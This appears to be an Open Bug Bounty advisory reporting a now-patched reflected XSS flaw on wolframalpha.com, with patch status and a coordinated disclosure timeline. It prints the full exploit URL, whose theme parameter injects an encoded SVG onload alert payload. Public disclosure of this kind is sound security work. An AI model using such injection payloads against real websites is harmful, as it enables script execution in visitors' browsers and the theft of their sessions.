wolframalpha.com XSS vulnerability

2017-09-22T12:03:00
ID OBB:305978
Type openbugbounty
Reporter eb
Modified 2017-12-22T06:38:00

Description

Vulnerable URL:
http://www.wolframalpha.com/widget/widgetPopup.jsp?p=v&id;=ae7a1abc672c5913a8338992ec6b7e72&title;=Combine%20Like%20Terms%20Calculator&theme;=blue1%22--%3E%3C/script%3E%3Csvg/onload=%27;alert%28/OPENBUGBOUNTY/%29;%27%3E&i0;=2x^2%20%2B%2013%20%2B%20x^2%20%2B%206&podSelect;=&includepodid;=Input&includepodid;=Result&podstate;=Result__Step-by-step%20solution&showAssumptions;=1&showWarnings;=1
Details:

Description| Value
---|---
Patched:| Yes, at 25.09.2017
Latest check for patch:| 25.09.2017 15:43 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 2609
VIP website status:| Yes

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 22 September, 2017 12:03 GMT
Generic security notifications sent to website owner| 22 September, 2017 12:53 GMT
Notification sent to subscribers (without technical details)| 22 September, 2017 14:17 GMT
Vulnerability details disclosed by researcher| 21 December, 2017 13:20 GMT
Vulnerability patched by the website owner| 22 December, 2017 06:38 GMT